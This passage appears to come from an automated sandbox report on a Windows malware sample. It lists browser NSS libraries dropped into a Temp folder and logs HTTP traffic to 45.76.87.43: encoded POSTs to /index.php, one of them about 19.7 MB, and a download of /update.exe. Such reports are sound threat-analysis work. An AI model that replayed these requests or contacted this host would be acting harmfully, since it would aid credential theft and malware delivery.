765 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
766 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
767 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
768 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
769 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
770 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
771 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
772 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
773 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
774 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
775 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
776 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
777 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
778 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
779 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
780 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
781 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
782 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
783 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
784 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
785 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
786 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
787 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
788 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
789 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
790 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
791 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
792 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
793 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
794 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
795 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
796 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
797 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
798 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
799 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
800 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
801 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
802 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
803 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
804 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
805 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
806 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
807 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
808 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
809 "C:\\Users\\user\\AppData\\Local\\Temp\\nUlIMci5lDcC.exe"
810
811
812* Modified Registry Keys:
813
814* Deleted Registry Keys:
815
816* DNS Communications:
817
818* Domains:
819
820* Network Communication - ICMP:
821
822* Network Communication - HTTP:
823
824 "count": 1,
825 "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
826 "uri": "http://45.76.87.43/index.php",
827 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
828 "method": "POST",
829 "host": "45.76.87.43",
830 "version": "1.1",
831 "path": "/index.php",
832 "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: 45.76.87.43\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
833 "port": 80
834
835
836 "count": 1,
837 "body": "",
838 "uri": "http://45.76.87.43/index.php",
839 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
840 "method": "POST",
841 "host": "45.76.87.43",
842 "version": "1.1",
843 "path": "/index.php",
844 "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: 45.76.87.43\r\nContent-Length: 19699671\r\nCache-Control: no-cache\r\n\r\n",
845 "port": 80
846
847
848 "count": 1,
849 "body": "",
850 "uri": "http://45.76.87.43/update.exe",
851 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
852 "method": "GET",
853 "host": "45.76.87.43",
854 "version": "1.1",
855 "path": "/update.exe",
856 "data": "GET /update.exe HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: 45.76.87.43\r\nCache-Control: no-cache\r\n\r\n",
857 "port": 80
858
859
860
861* Network Communication - SMTP:
862
863* Network Communication - Hosts:
864
865 "country_name": "Germany",
866 "ip": "45.76.87.43",
867 "inaddrarpa": "",
868 "hostname": ""
869
870
871
872* Network Communication - IRC: